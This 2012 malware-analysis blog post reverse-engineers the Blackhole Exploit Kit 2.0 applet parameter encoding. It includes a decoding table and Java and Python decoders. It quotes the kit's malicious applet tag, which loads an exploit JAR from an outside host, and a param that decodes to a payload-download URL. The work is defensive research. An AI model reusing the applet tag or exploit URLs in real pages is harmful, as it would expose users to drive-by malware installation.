Sunday, October 14, 2012

BHEK 2.0 Encoded Applet param cracked


The most common (possibly the only) param value passed to BHEK 2.0 JAR files seems to follow a certain logic.  BHEK 2.0 JARs don't seem to decompile correctly in JAD or FrontEnd Plus, which is a real headache for anyone who wants to find out the encoded param value.  Usually I just decompile the JAR and find the function that decodes the param, like so:

class CalloutApp
{
    CalloutApp()
    {
    }

    // Decoder copied from the decompiled JAR. This version keeps every
    // fourth character of the param string, starting at index 3.
    public static String Ur(String s)
    {
        String s1 = "";
        int i = s.length();
        for(int j = 3; j < i; j += 4)
            s1 = (new StringBuilder()).append(s1).append(s.substring(j, j + 1)).toString();

        return s1;
    }

    // Paste the param value from the exploit page here, then compile and run.
    public static void main(String args[])
    {
        System.out.println(Ur("Place your param string here"));
    }
}

The only thing I change is the body of the static String Ur function, so that it matches whatever decoding logic I find in the malicious JAR.  Compile it, run it in a terminal, and the output gives me the callback.  All of that changed with BHEK 2.0.

Nowadays BHEK 2.0 JARs don't decompile well, so today I collected as many samples as possible to build a comprehensive alphabet list.

When the obfuscated BHEK page is loaded there is usually an applet as well.  For this example I'll use the applet from a recent Vericon Labs malware request I saw via a retweet from MalwareMustDie.

<applet archive="http://voxility-gaozari.net/links/entity_committee.php?ofsa=070337020a&gyim=3f39&yeapv=ofkxvcam&cturr=uriii" code="greateac"><param value='N0b0909041f31310e1740324332091e22051a17121a44323c3a35093143323a111931353a0932091e0c3817232332090935353c040b043d052c391c291c0808291c271c1a0244353908081c281c181c3e1c2908081c341c081c291c2b022c391c27022336392302321a3905' name='&#117;&#105;d' /></applet>

Notice the <param value=> field: that is the encoded value passed to the JAR file, which, if the exploit succeeds, will in most cases lead your host to download an .exe.  If you look closely at the value you may notice a pattern.

N  0b  09  09  04  1f  31  31
   h   t   t   p   :   /   /

(no idea what the "N" is used for)

So now we can simply begin to build an alphabet list.  Unfortunately I had to do this manually because of the JAR decompilation issues.

The encoded param decodes to the following:

http://voxility-gaozari.net/links/entity_committee.php?gf=070337020a&re=330b0809073306030704&f=02&mj=m&ia=g

Below is the list (plaintext character = encoded two-hex-digit value).  I may be missing other values, but I have been able to decode several encoded params using this key.

1 = 37
2 = 27
3 = 08
4 = 2b
5 = 42
6 = 34
7 = 29
8 = 18
9 = 3e
0 = 1c

= = 39
& = 02
? = 3d
_ = 0c
- = 22
. = 3c
/ = 31
: = 1f

a = 1a
b = 28
c = 38
d = 00
e = 35
f = 2c
g = 05
h = 0b
i = 32
j = 36
k = 11
l = 43
m = 23
n = 3a
o = 17
p = 04
q = 01
r = 44
s = 19
t = 09
u = 21
v = 0e
w = 0a
x = 40
y = 1e
z = 12
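As an added example (not code from this post or from the exploit kit), here is a Python decoder that applies the table above to the applet param quoted earlier. It also includes a small routine that recovers the table from a param whose decoded URL is already known, which automates the manual alphabet building described above and flags any token that would need two different characters. The sample input is the param and decoded URL from this post; the leading "N" is skipped, as its purpose is unknown.

```python
from __future__ import annotations

# Substitution table from the post, inverted for decoding: two-hex-digit token -> character.
KEY = {
    "37": "1", "27": "2", "08": "3", "2b": "4", "42": "5",
    "34": "6", "29": "7", "18": "8", "3e": "9", "1c": "0",
    "39": "=", "02": "&", "3d": "?", "0c": "_", "22": "-",
    "3c": ".", "31": "/", "1f": ":",
    "1a": "a", "28": "b", "38": "c", "00": "d", "35": "e",
    "2c": "f", "05": "g", "0b": "h", "32": "i", "36": "j",
    "11": "k", "43": "l", "23": "m", "3a": "n", "17": "o",
    "04": "p", "01": "q", "44": "r", "19": "s", "09": "t",
    "21": "u", "0e": "v", "0a": "w", "40": "x", "1e": "y",
    "12": "z",
}

def _tokens(value: str) -> list[str]:
    """Strip the leading 'N' (purpose unknown, as the post notes) and split
    the rest into two-character tokens."""
    body = value[1:] if value[:1] == "N" else value
    if len(body) % 2:
        raise ValueError("odd-length param body: not a sequence of two-char tokens")
    return [body[i:i + 2].lower() for i in range(0, len(body), 2)]

def decode_param(value: str) -> str:
    """Decode one applet param. Tokens missing from the table come out as
    '[xx]' so a partial decode stays readable and the gap is obvious."""
    return "".join(KEY.get(t, f"[{t}]") for t in _tokens(value))

def learn_key(encoded: str, plaintext: str) -> dict[str, str]:
    """Recover token -> char pairs from a param whose decoded URL is already
    known (e.g. the URL a sandbox saw the applet fetch). This automates the
    manual alphabet building in the post and refuses if one token would need
    two different characters, i.e. if the scheme is not a plain substitution."""
    tokens = _tokens(encoded)
    if len(tokens) != len(plaintext):
        raise ValueError("token count does not match plaintext length")
    key: dict[str, str] = {}
    for tok, ch in zip(tokens, plaintext):
        if key.setdefault(tok, ch) != ch:
            raise ValueError(f"token {tok} maps to both {key[tok]!r} and {ch!r}")
    return key

# Sample input: the param and decoded URL quoted in this post.
PARAM = "N0b0909041f31310e1740324332091e22051a17121a44323c3a35093143323a111931353a0932091e0c3817232332090935353c040b043d052c391c291c0808291c271c1a0244353908081c281c181c3e1c2908081c341c081c291c2b022c391c27022336392302321a3905"
EXPECTED_URL = "http://voxility-gaozari.net/links/entity_committee.php?gf=070337020a&re=330b0809073306030704&f=02&mj=m&ia=g"

if __name__ == "__main__":
    print(decode_param(PARAM))
    print(f"{len(learn_key(PARAM, EXPECTED_URL))} token/char pairs recovered from this one sample")
```

A single sample only yields the characters that occur in its URL (the digits 1 and 5, for instance, never appear here), so several known pairs have to be combined to reach the full table above.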
